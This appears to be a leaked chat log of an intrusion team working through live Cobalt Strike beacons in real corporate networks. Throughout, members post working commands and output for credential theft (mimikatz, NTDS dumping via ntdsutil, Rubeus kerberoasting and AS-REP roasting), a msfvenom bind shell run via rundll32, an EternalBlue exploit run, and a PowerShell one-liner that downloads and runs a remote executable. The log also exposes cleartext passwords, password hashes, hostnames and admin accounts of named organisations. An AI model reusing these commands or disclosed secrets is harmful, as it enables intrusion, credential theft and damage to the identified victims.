Date: 2020-09-07T12:19:48.671Z
From: white
Message: ```apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql

change root password
passwd root

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

chmod +x msfinstall
./msfinstall

then edit this file
nano /opt/metasploit-framework/bin/msfdb

commenting on the lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database"

save and exit

Date: 2020-09-15T19:11:04.488Z
From: cybercat
Message: here is the config, what to change I think you will understand)
```
#!/bin/bash
/sbin/iptables -F && \
/sbin/iptables -F -t nat && \
/sbin/iptables -X && \
/sbin/iptables -P INPUT ACCEPT && \
/sbin/iptables -P FORWARD ACCEPT && \
/sbin/iptables -P OUTPUT ACCEPT && \
/sbin/iptables-save > /dev/null
/sbin/iptables -P OUTPUT DROP
/sbin/iptables -A INPUT -i lo -j ACCEPT
/sbin/iptables -A INPUT -m state --state ESTABLISHED, RELATED -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT
# ip ot subscription 183.30.41.59 our = 83.193.11:210
/sbin/iptables -A OUTPUT -o eth0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o wlp3s0 -d 83.193.11:210 -j ACCEPT
/sbin/iptables -A OUTPUT -o tun0 -j ACCEPT
/sbin/iptables -A OUTPUT -m state --state ESTABLISHED, RELATED -j ACCEPT

Date: 2020-09-18T09:41:54.751Z+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
From: user7
beacon> mimikatz kerberos::list
[*] Tasked beacon to run mimikatz's kerberos::list command
[+] host called home, sent: 706120 bytes
[00000000] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authentication; renewable; forwarded; forwardable;
[00000001] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 8:27:44 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : krbtgt/PKGPROD.LOCAL @ PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40e10000 : name_canonicalize ; pre_authentication; initial ; renewable; forwardable;
[00000002] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/18/2020 4:48:38 AM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : RPCSS/2K12SERVER.pkgprod.local@PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authentication; renewable; forwardable;
[00000003] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : ldap/2k12server.pkgprod.local@PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authentication; renewable; forwardable;
[00000004] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:33 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : cifs/2k12server.pkgprod.local/pkgprod.local@PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authentication; renewable; forwardable;
[00000005] - 0x00000012 - aes256_hmac
Start/End/MaxRenew: 9/17/2020 9:06:32 PM ; 9/18/2020 6:27:44 AM ; 9/24/2020 8:27:44PM
Server Name : LDAP/2k12server.pkgprod.local/pkgprod.local@PKGPROD.LOCAL
Client Name : jess @ PKGPROD.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authentication; renewable; forwardable;

Date: 2020-09-18T20:58:48.453Z	
	From: tl1
	Message: before that, it's better to jump into the winlogon
	Date: 2020-09-18T20:57:58.257Z
	From: tl1
	Message: how it's done:
	1) check the status of the service that is responsible for this: `sc query vss`
	2) if off, then `sc start vss`, if on, then leave
	3) Dump: `ntdsutil "ac in ntds" "ifm" "cr fu c:\windows\temp\abcd" qq`
	4) check the status of the service `sc query vss`, and return to its original state

Date: 2020-09-18T20:57:08.074Z	
	From: user3
	Message: msfvenom -p windows/x64/meterpreter_bind_tcp rhost=10.10.30.17 lport=4444 --format raw -a x64 --platform windows --out bindshell.bin
	4:55
	upload /home/user/Desktop/shellConcat/bindshell64.dll
	shell rundll32 C:\users\lgentry\bindshell64.dll entryPoint
	4:55
	./shellConcatenation.1.0.0 --source=shellStarter_x64.dll --target=bindshell64.dll --addBin=bindshell.bin
	stanislavtimofeish 5:01 PM
	shell rundll32 C:\users\lgentry\bindshell64.dll entryPoint
	msf6 exploit(multi/handler) >
	Date: 2020-09-18T20:56:16.755Z
	From: tl1
	Message: Now the task is to dump the NTDS on the DC
	Date: 2020-09-18T20:09:22.207Z
	From: user3
	Message: find_tag

Date: 2020-09-21T09:42:13.363Z
From: user3
beacon> shell net localgroup "Administrators"
[*] Tasked beacon to run: net localgroup "Administrators"
[+] host called home, sent: 62 bytes
Comment Administrators have complete and unrestricted access to the computer/domain
sysadmin
ZOHOCORP\raja-9298

Date: 2020-09-21T09:48:19.050Z
From: user3
beacon> shell nslookup
[*] Tasked beacon to run: nslookup
[+] host called home, sent: 39 bytes
Default Server: UnKnown
Address: 192.168.100.30
`Domain : csez.zohocorpin.com`

Date: 2020-09-21T10:04:33.704Z
From: user8
Windows Defender
Kaspersky Endpoint Security for Windows
======DotNet======
Installed CLR Versions
4.0.30319
Installed .NET Versions
4.8.03752
Anti-Malware Scan Interface (AMSI)
OS supports AMSI : True
.NET version support AMSI : True
[!] The highest .NET version is enrolled in AMSI!
======NetworkShares======
Name : ADMIN$
Path : C:\WINDOWS
Description : Remote Admin
Name : C$
Path : C:\
Description : Default share
Name : D$
Path : D:\
Description : Default share
Name : E$
Path : E:\
Description : Default share
Name : IPC$
Path :
Description : Remote IPC
======OSInfo======
Hostname : raja-9298
Domain Name : csez.zohocorpin.com
Username : ZOHOCORP\raja-9298
ProductName : Windows 10 Pro
Edition ID : Professional
ReleaseId : 1909
Build : 18363.1082
BuildBranch : 19h1_release
CurrentMajorVersionNumber : 10
CurrentVersion : 6.3
Architecture: AMD64
ProcessorCount : 12
IsVirtualMachine : False
BootTimeUtc (approx) : 12-09-2020 18:15:41 (Total uptime: 08:15:23:11)
HighIntegrity : False
IsLocalAdmin : True
[*] In medium integrity but user is a local administrator - UAC can be bypassed.
CurrentTimeUtc : 21-09-2020 09:38:52 (Local time: 21-09-2020 15:08:52)
TimeZone : India Standard Time
TimeZoneOffset : 05:30:00
InputLanguage : English (India)
InstalledInputLanguages : English (India), Unknown layout
MachineGuid : e2c815c9-b79d-4a27-bc08-6c917f3ab98d
======InstalledProducts======
Adobe Flash Player 10 Plugin
10.2.153.1
Adobe Shockwave Player 12.1
12.1.3.153
CVSNT
2.0.51
WinCvs 2.0
Google Chrome
85.0.4183.102
Microsoft Edge
85.0.564.51
Microsoft Edge Update
1.3.135.29
teamviewer
15.3.8497
TotalCSVConverter
Intel(R) Wireless Bluetooth(R)
20.60.1
DcuMSMWrap
5.0.03
Microsoft Visual C++ 2013 Redistributable (x64)
12.0.30501.0
Realtek USB Audio
6.3.9600.2202
Python 3.7.3 Tcl/Tk Support (32-bit)
3.7.3150.0
DFUDriverSetupX64Setup
6/6/1939.0
Python 3.7.3 Documentation (32-bit)
3.7.3150.0
Thunderbolt Software
17.4.79.510
Python 3.7.3 Core Interpreter (32-bit)
3.7.3150.0
Skype for Business Web App Plug-in
15.8.20020.400
Microsoft VC++ redistributables repacked.
12.0.0.0
Java Auto Updater
2.8.71.15
MySQL Installer - Community
1.4.29.0
Python 3.7.3 Development Libraries (32-bit)
3.7.3150.0
Intel(R) Chipset Device Software
10.1.17541.8066
Manage Engine Analytics Plus
1.0
Google Update Helper
1.3.35.451
swMSM
12.0.0.1
ManageEngine
10.0.518.W
ZVoice-Desktop 1.1.9
Mozilla Firefox 79.0 (x64 en-US)
PuTTY release 0.74 (64-bit)
Mercurial 3.8.1 (x64)
FortiClient VPN
6.2.0.0780
LibreOffice 6.2.4.2
6.2.4.2
MySQL Server 5.7
5.7.26

Date: 2020-09-21T10:13:02.226Z
From: user8
====== RDPSavedConnections ======
Saved RDP Connection Information (S-1-5-21-1867688552-3649366528-3325780993-65238)
RemoteHost UsernameHint
---------- ------------
pmp-2k8r2-dc1 pmp\administrator
pmp-w7-jap pmp\administrator
pmp-win10-64-2 pmp\administrator
pmp2k16 administrator
ramanathan-0501 ZOHOCORP\ramanathan-0501
====== RDPSessions ======
SessionID : 0
SessionName : Services
domain name :
State : Disconnected
SourceIp :
SessionID : 1
SessionName : Console
UserName : raja-9298
DomainName : ZOHOCORP
State : Active
SourceIp :
======LogonSessions======
Logon Sessions (via WMI)
UserName : raja-9298
Domain : ZOHOCORP
LogonId : 34354149
LogonType : Interactive
AuthenticationPackage : Kerberos
StartTime : 13-09-2020 10:40:04
UserPrincipalName :
UserName : raja-9298
Domain : ZOHOCORP
LogonId : 34354119
LogonType : Interactive
AuthenticationPackage : Kerberos
StartTime : 13-09-2020 10:40:04
UserPrincipalName :
====== LSASettings ======
auditbasedirectories : 0
auditbaseobjects : 0
Bounds : 00-30-00-00-00-20-00-00
crashonauditfail : 0
fullprivilegeauditing : 00
LimitBlankPasswordUse : 1
NoLmHash : 1
Security Packages : ""
Notification Packages : scecli
Authentication Packages : msv1_0
disabledomaincreds : 0
everyoneincludesanonymous : 0
forceguest: 0
LsaCfgFlagsDefault : 0
lsapid : 908
ProductType : 6
restrictanonymous : 1
restrictanonymoussam : 1
scenoapplylegacyauditpolicy : 1
Secure Boot : 1
usemachineid : 0
======LocalUsers======
ComputerName : localhost
UserName : Administrator
Enabled : False
Rid: 500
UserType : Administrator
Comment : Built-in account for administering the computer/domain
PwdLastSet : 01-01-1970 00:00:00
LastLogon : 28-05-2019 23:10:40
NumLogins : 5
ComputerName : localhost
UserName : DefaultAccount
Enabled : False
Rid: 503
UserType : Guest
Comment : A user account managed by the system.
PwdLastSet : 01-01-1970 00:00:00
LastLogon : 01-01-1970 00:00:00
NumLogins : 0
ComputerName : localhost
UserName : Guest
Enabled : False
Rid: 501
UserType : Guest
Comment : Built-in account for guest access to the computer/domain
PwdLastSet : 01-01-1970 00:00:00
LastLogon : 01-01-1970 00:00:00
NumLogins : 0
ComputerName : localhost
UserName : sysadmin
Enabled : True
Rid: 1001
UserType : Administrator
Comment :
PwdLastSet : 19-06-2019 14:28:18
LastLogon : 15-08-2019 08:31:17
NumLogins : 31
ComputerName : localhost
UserName : WDAGUtilityAccount
Enabled : False
Rid: 504
UserType : Guest
Comment : A user account managed and used by the system for Windows Defender Application Guard scenarios.
PwdLastSet : 28-05-2019 22:52:09
LastLogon : 01-01-1970 00:00:00
NumLogins : 0

Date: 2020-09-21T10:47:18.146Z
From: user3
[*] OS Build Number: 18363
[*] Enumerating installed KBs...
4576484
4517245
4560959
4561600
4565554
4569073
4576751
4576754
4574727
[!] CVE-2019-1385 : VULNERABLE
[>] https://www.youtube.com/watch?v=K6gHnr-VkAg
[!] CVE-2019-1405 : VULNERABLE
[>] https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system -via-the-upnp-device-host-service-and-the-update-orchestrator-service/
[>]https://github.com/apt69/COMahawk
[*] Finished. Found 2 potential vulnerabilities.

Date: 2020-09-21T11:08:44.605Z
From: user4
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
The request will be processed at a domain controller for domain csez.zohocorpin.com.
Administrator adssp assetprober
desktopcentral gjprabu-0985 kamal-0150
nocfw sysadmin sysaudit
vijay-3486 zohoits

Date: 2020-09-21T13:05:40.164Z
From: user8
beacon> execute-assembly /home/user/Desktop/cobalt/Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\Users\raja-9298\ EULA_ha.txt
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[X] No users found to Kerberoast!
[*] Roasted hashes written to : C:\Users\raja-9298\EULA_ha.txt

Date: 2020-09-21T14:20:06.387Z
From: tl1
Message: ```
execute-assembly /Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt

Date: 2020-09-21T22:21:26.334Z
From: user7
ERROR: FindOne : Exception calling "FindOne" with "0" argument(s): "The server is not operational.
ERROR: At line:145 char:36
ERROR: + $user = $search.FindOne<<<<()
ERROR: user : The variable '$user' cannot be retrieved because it has not been set.
ERROR: At line:146 char:22
ERROR: + if ($user <<<< -ne $null)
ERROR: + CategoryInfo : InvalidOperation: (user:Token) [], RuntimeException
ERROR: FullyQualifiedErrorId : VariableIsUndefined

Date: 2020-09-21T22:09:42.092Z
From: tl2
Parsing file: \\GPJ.LOC\sysvol\GPJ.LOC\policies\{20FA66DA-01F3-493D-A72B-23C077395633}\Machine\Preferences\Groups\Groups.xml
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe

Date: 2020-09-22T14:15:23.914Z
From: user3
Message: @tl2 any ideas?
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] 192.168.113.242:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.113.242:445 - Host is likely VULNERABLE to MS17-010! - Windows 10 Pro 10586 x64 (64-bit)
[*] 192.168.113.242:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.113.242:445 - Connecting to target for exploitation.
[+] 192.168.113.242:445 - Connection established for exploitation.
[+] 192.168.113.242:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.113.242:445 - CORE raw buffer dump (20 bytes)
[*] 192.168.113.242:445 - 0x00000000 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 31 Windows 10 Pro 1
[*] 192.168.113.242:445 - 0x00000010 30 35 38 36 0586
[+] 192.168.113.242:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.113.242:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.113.242:445 - Sending all but last fragment of exploit packet
[-] 192.168.113.242:445 - RubySMB::Error::CommunicationError: Read timeout expired when reading from the Socket (timeout=30)
[*] Started bind TCP handler against 192.168.113.242:4444
msf6 exploit(windows/smb/ms17_010_eternalblue) >

Date: 2020-09-22T12:48:57.390Z
From: user8
Message: `Win Server 2008 R2`
win2k8adc.localzoho.com [172.20.3.7]
vcenter.localzoho.com [172.20.3.7]
print-server-bk.localzoho.com [172.20.3.7]
hpacc-control.localzoho.com [172.20.3.7]
printserver.csez.zohocorpin.com [192.168.100.206]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
est-av-server.csez.zohocorpin.com [192.168.100.68]
finance-server.csez.zohocorpin.com [192.168.112.132]
integ-i18n.csez.zohocorpin.com [192.168.113.56]
tally-server.csez.zohocorpin.com [192.168.206.51]

Date: 2020-09-22T12:15:55.425Z
From: tl2
Message: well, there is already one
then on 17-010 you can still scan the server win2008

Date: 2020-09-23T18:53:36.552Z
From: user9
2020-09-24T00:20:44 - HTTP request for / received from 10.59.0.243
2020-09-24T00:20:44 - HTTP NTLMv2 challenge/response captured from 10.59.0.243 (RAJA-9298):
raja-9298::ZOHOCORP:B3BD81E12761C973:76647C5C0CB37CE1C766147E15568B0B:

Date: 2020-09-23T18:06:08.479Z
From: user8
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:ru.zohocorpin.com
[+] host called home, sent: 318067 bytes
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=ru,DC=zohocorpin,DC=com' for AS-REP roastable users
[X] Error executing the domain searcher: A referral was returned from the server.

Date: 2020-09-23T18:04:55.519Z
From: user8
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[+] host called home, sent: 318069 bytes
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: AS-REP roasting
[*] Target Domain : tsi.zohocorpin.com
[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=tsi,DC=zohocorpin,DC=com' for AS-REP roastable users
[X] No users found to AS-REP roast!

Date: 2020-09-23T18:02:48.455Z
From: user7
beacon> execute-assembly Rubeus.exe kerberoast /domain:en.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[+] host called home, sent: 320115 bytes
's been like this for 5 minutes

Date: 2020-09-23T17:59:28.405Z
From: user8
Message: nothing, still thinking

Date: 2020-09-23T17:58:46.626Z
From: tl1
Message: try with rubeus

Date: 2020-09-23T17:59:28.439Z
From: tl1
Message: second trust?

Date: 2020-09-23T17:59:59.840Z
From: user8
beacon> psinject 24992 x86 invoke-kerberoast -domain zohocorpin.com | fl
[*] Tasked beacon to psinject: invoke-kerberoast -domain en.zohocorpin.com | fl into 24992 (x86)
ERROR: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
ERROR: At line:990 char:20
ERROR: + else { $Results = $UserSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: 2020-09-23T17:51:35.149Z
From: tl1
Message: seriously?) I saw it for the first time. Where is the invok kerb on trusts?

Date: 2020-09-23T17:50:49.612Z
From: user3
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]
dn:CN=ru.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: en.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)]
>trustPartner: www.zohocorpin.com
>trustType: 2 [UpLevel(2)]
>trustAttributes: 8 [Transitive(8)]

Date: 2020-09-23T17:51:35.178Z
From: tl1
Message: where are the trusts?

Date: 2020-09-23T17:48:51.968Z
From: user3

Date: 2020-09-23T17:48:40.972Z
From: tl2
Message: yes, apparently missed, it doesn't matter, but for the future I say again - psinject is better than powerpick

Date: 2020-09-23T17:48:38.351Z
From: user8
Message: :woozy_face:

Date: 2020-09-23T17:47:43.447Z
From: user8
beacon> powerpick invoke-kerberoast | fl
[*] Tasked beacon to run: invoke-kerberoast | fl (unmanaged)
[+] host called home, sent: 133715 bytes
[-] could not spawn C:\WINDOWS\sysnative\mstsc.exe: 5
beacon> psinject 24992 x86 invoke-kerberoast | fl
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 24992 (x86)
TicketByteHexStream :
Hash : $krb5tgs$http/its-winca.csez.zohocorpin.com:2DE4E99FA6FA68CC689ABB47E0A6F97A
$62CF27C5AB593341D3B81B5F5BBCAA82925936965DE779974EE5D9923A4463AB3AAC63712F8
AC686D7193085E3B65354BB01B206F486C8DFDAD4531340B194A139C6ACE7BCAEC0E5BFA8F6F
056E78530335D087197D488628A16DB5732A440C6AA5E5C3A075F9DD6D35828DD52F49D56DBA
F45A7961229719149BF41084852247F8218EF29AD26227013FEAF80446DEE2D7D8B0DE37D6D3
8D4E0B6210C5574193987229D4B56BAE3DB0D93BC51CF4EC46F6EDCE0F12F8ADF9A73AD3242E
3F727E16CEAE7B5C2A629A6EFAD4C13DF512C7B6E61C818D7CB23E5C229A97A43794559F0FF2
58F53EF5C8E9D5D2D70FCBDC531B60C5A883D5618FD4AF4D39ECB105359492C8FA6C7064C9FB
DAC355868D6DCCAB5A73BE7C23EFF30F174AE1CCD12A1A5D057B385214B847A625A8ACAAA9E5
C5568B7D2D19ED68ACA10685A739E12A758DF6111E9160681618BC37BC24FCCFBA1E6AADFF3C
B0F00B635C1E143A84F22E72B27FFD104F589C557DFAF79621014976E4E580B6789A6D97932F
0EAEC59393D64A9C1DA4572CDCD6C1F78A16426695EBF51A2C978039B273B4AE0779B3168A7F
50CF65541DC98D548907E1C58E04C54F5FF39C27759800CFA8B401A777786F28774BBD01A1AB
CC0DEDA88201FB6C11EA6C5F60919803D4F3238ED543B9F4B9B3139D3FF102C72C6DFD1E8DBA
C11A46344A45ECA49EB45C70C9431571AA14E7B340CFD54DFC7D290068708EB64EFE74BA3EFE
7A292ACAC6DA8E8BB9F0BCEE85D3FE389F854E66AE34587845C063DEE2A0AB6812C3A42CDFE2
7494F46E38B41C0BEDEB118A3EFB5ADF2088E92C3B19FCB2211443CFD240A718293B194B0CCF
2F3E03DE23E80AA1B025C6881814153E8B747097D07841813372284DA9F49BF6D449036C8741
8F19339E029B7119E9BA8400B5AB5834E13D7521403108E24C06B96674D014F1296D9EDCF916
2E71FB2786013E934719E2530D9FC854EEFFA748AAB0873F9F923F3AAECF11C2EBE5E79D6CEB
F8494096F73BB8A01332CD999FA48D5F92E639C21E62D1AD3B6AA650840AA2370239B806D201
0DF25292FF9A23827E3D642EF377BFDEE2E7DD9C6E30C3725C82D4DA58E670AE117A8D649A1F
2F6C241B1CED24A5ACD42C153223C3047CCF736CB4503D3659110334A5D3F1B8D477A20D3FC5
2A5E82B9211116D511940BE9FC84084A3C09E132570F88C63B0B117E12B596FDA44CD79AD5D7
E960C5C41C85DF4C5AEC9A6F728FCC3645DE6548393D1924B0360C406A807449CE7471659221
1EB1763E6718A2838761A05ACC8B02418E1DF57E1080F41CB6F5EEA90979BF969BE2EF91826F
84C29AA15B0BBD66E83662C4EE9F12F0DEA7F4E128F7FF4324EF999B6A6B4EFA34859BEA6140
394AE19A9A1EC83D9A03E2CDDE651262D3033CD846EAACA9E5D6A8D054A1D9A85133875B14B5
B64C10A3E7DB5E29E3C99A1101AA50BA231455E0AAC4F69603ABC93379E3404792A65C7A93CE
18D5AF6E666FCF9E4B8C28CD22371F71CD349C0D4DA0DB27898065D389491B37B89DD67364EE
B82D8F677730EFE646BEB35CE968C0EEBFC7ED5A076F5924AC6ABE5E2D776DC2E49
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt

Date: 2020-09-23T17:45:51.134Z
From: user3
Message: Did someone tell us?

Date: 2020-09-23T17:48:52.003Z
From: tl2
Message: why do you keep using powerpick instead of psinject?


Date: 2020-09-25T09:06:16.282Z
From: user4
Message: I think something like `powershell.exe -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('https://drive.google.com/uc?export =download&id=0B1NUTMCAOKBTdVQzTXlUNHBmZUU',"$env:APPDATA\ps.exe");Start-Process ("$env:APPDATA\ps.exe")`

Date: 2020-09-25T16:39:56.710Z
From: user4
Message: did like this
beacon> shell wmic nic get name, index
[*] Tasked beacon to run: wmic nic get name, index
index name
0 Microsoft Kernel Debug Network Adapter
1 Intel(R) Ethernet Connection (6) I219-V
2 Intel(R) Wi-Fi 6 AX200 160MHz
3 Microsoft Wi-Fi Direct Virtual Adapter
4 Fortinet Virtual Ethernet Adapters (NDIS 6.30)
5 Fortinet SSL VPN Virtual Ethernet Adapter
6 PPPoP WAN adapters
7 WAN Miniport (SSTP)
8 WAN Miniport (IKEv2)
9 WAN Miniport (L2TP)
10 WAN Miniports (PPTP)
11 WAN Miniport (PPPOE)
12 WAN Miniports (IP)
13 WAN Miniport (IPv6)
14 WAN Miniport (Network Monitor)
15 Bluetooth Device (Personal Area Network)
16 Microsoft Wi-Fi Direct Virtual Adapter #2
17 Broadcom NetXtreme Gigabit Ethernet
beacon> shell wmic path win32_networkadapter where index=4 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable
beacon> shell wmic path win32_networkadapter where index=5 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable
[+] host called home, sent: 174 bytes
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
	ReturnValue = 0;
};
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
	ReturnValue = 0;
};

Date: 2020-09-29T09:34:00.577Z
From: user8
FortiNet
User1-2 beacon > shell type setting.ini
[*] Tasked beacon to run: type setting.ini
[+] host called home, sent: 47 bytes
[CONFIG]
CATEGORY=BROWSER;OFFICE;PDF;JAVA;MISC
[TRACK]
BROWSER=firefox.exe;chrome.exe;iexplore.exe;opera.exe;plugin-container.exe;opera_plugin_wrapper.exe;opera_plugin_wrapper_32.exe;FlashPlayerPlugin_*.exe
OFFICE=powerpnt.exe;winword.exe;excel.exe;EQNEDT32.exe
PDF=acrord32.exe;acrobat.exe;foxit reader.exe
JAVA=java.exe;javaw.exe;javaws.exe
MISC=helpctr.exe;hh.exe;wscript.exe;winhlp32.exe;loaddll.exe
[DANGEROUS]
BROWSER=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
OFFICE=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
PDF=cmd.exe;wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
JAVA=wscript.exe;cscript.exe;powershell.exe;net.exe;regsvr32.exe
MISC=powershell.exe;net.exe;regsvr32.exe
[PROTECTION]
FLAGS=0
[REACTION]
MODE=0
[DESCRIPTIONS]
firefox.exe=Mozilla Firefox
chrome.exe=Google Chrome
iexplore.exe=Internet Explorer
opera.exe=Opera Internet Browser
plugin-container.exe=Plugin Container for Firefox
opera_plugin_wrapper.exe=Opera Internet Browser Plugin Wrapper
opera_plugin_wrapper_32.exe=Opera Internet Browser Plugin Wrapper (32 bit)
FlashPlayerPlugin_*.exe=Adobe Flash Player Plugin
powerpnt.exe=Microsoft PowerPoint
winword.exe=Microsoft Word
excel.exe=Microsoft Excel
acrord32.exe=Adobe Acrobat Reader
acrobat.exe=Adobe Acrobat
foxit reader.exe=Foxit Reader
java.exe=Java Platform SE
javaw.exe=Java Platform SE
javaws.exe=Java Web Start Launcher
helpctr.exe=Microsoft Help and Support Center
hh.exe=Microsoft HTML Help Executable
wscript.exe=Microsoft Windows Based Script Host
winhlp32.exe=Windows Help
loaddll.exe=LoadDll
cscript.exe=Microsoft Console Based Script Host
powershell.exe=Windows Powershell
net.exe=Windows Net Command
regsvr32.exe=Microsoft Register Server
cmd.exe=Windows Command Processor
dw20.exe=Microsoft Application Error Reporting
eqnedt32.exe=Microsoft Equation Editor

Date: 2020-09-29T09:33:38.888Z
From: user8
User1-2 beacon> shell route print -4
[*] Tasked beacon to run: route print -4
[+] host called home, sent: 45 bytes
================================================= =========================
Interface List
10...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
14...00 68 eb 67 1a a2 ......Intel(R) Ethernet Connection (6) I219-V
22...04 ed 33 e4 5f 2b ......Microsoft Wi-Fi Direct Virtual Adapter
7...06 ed 33 e4 5f 2a ......Microsoft Wi-Fi Direct Virtual Adapter #2
18...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
11...04 ed 33 e4 5f 2a ......Intel(R) Wi-Fi 6 AX200 160MHz
1...........................Software Loopback Interface 1
================================================= =========================
IPv4 Route Table
================================================= =========================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.80 50
127.0.0.0 255.0.0.0 On-link 127.0.0.1 331
127.0.0.1 255.255.255.255 On-link 127.0.0.1 331
127.255.255.255 255.255.255.255 On-link 127.0.0.1 331
192.168.0.0 255.255.255.0 On-link 192.168.0.80 306
192.168.0.80 255.255.255.255 On-link 192.168.0.80 306
192.168.0.255 255.255.255.255 On-link 192.168.0.80 306
224.0.0.0 240.0.0.0 On-link 127.0.0.1 331
224.0.0.0 240.0.0.0 On-link 192.168.0.80 306
255.255.255.255 255.255.255.255 On-link 127.0.0.1 331
